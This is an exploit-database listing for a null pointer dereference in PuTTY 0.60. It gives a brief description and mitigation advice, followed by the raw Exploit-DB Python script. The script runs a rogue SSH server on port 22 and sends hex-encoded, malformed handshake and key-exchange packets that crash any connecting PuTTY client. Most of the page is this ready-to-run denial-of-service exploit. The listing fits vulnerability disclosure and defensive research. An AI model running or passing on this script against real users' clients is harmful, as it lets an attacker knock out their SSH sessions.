header-logo
Suggest Exploit
vendor:
putty
by:
5.5
CVSS
MEDIUM
Null Pointer Dereference
476
CWE
Product Name: putty
Affected Version From: 0.6
Affected Version To: 0.6
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

putty 0.60 Null Ptr

This exploit allows an attacker to crash the putty application by sending specially crafted packets. The vulnerability exists due to improper handling of null pointers in the application. By sending a specific payload, an attacker can trigger a null pointer dereference, leading to a crash.

Mitigation:

Apply the latest patch or update for putty to fix the null pointer dereference vulnerability. Alternatively, use an alternative SSH client until a patch is available.
Source

Exploit-DB raw data:

print "\n" 
print "----------------------------------------------------------------" 
print "| putty 0.60 Null Ptr                                           |" 
print "| Level Smash the Stack                                         |" 
print "----------------------------------------------------------------" 
print "\n"

import sys, socket, binascii
HOST = sys.argv[1]
PORT = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
buf = [
	("5353482d322e302d57654f6e6c79446f20322e312e330d0a"),
	("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616"
	"e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613"
	"10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6"
	"362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726"
	"96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323"
	"5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657"
	"33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626"
	"32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322"
	"d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7"
	"22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
	"d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"
	"d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000"
	"111001111111111111111111111111111"), ## The 00 controls the crash
	("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3"
	"64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c"
	"76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd"
	"85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0"
	"000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97"
	"3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d"
	"a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a"
	"f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15"
	"3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3"
	"b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca"
	"75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804"
	"20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc"
	"6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045"
	"ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf"
	"cac4453d629a47d000000000000000000"),
	("0000000c0a15a1640000c32700008e14")
	]


i = 0
for i in range(0,len(buf)):
    conn.send(binascii.unhexlify(buf[i]))
    i+=1
conn.close()
s.close()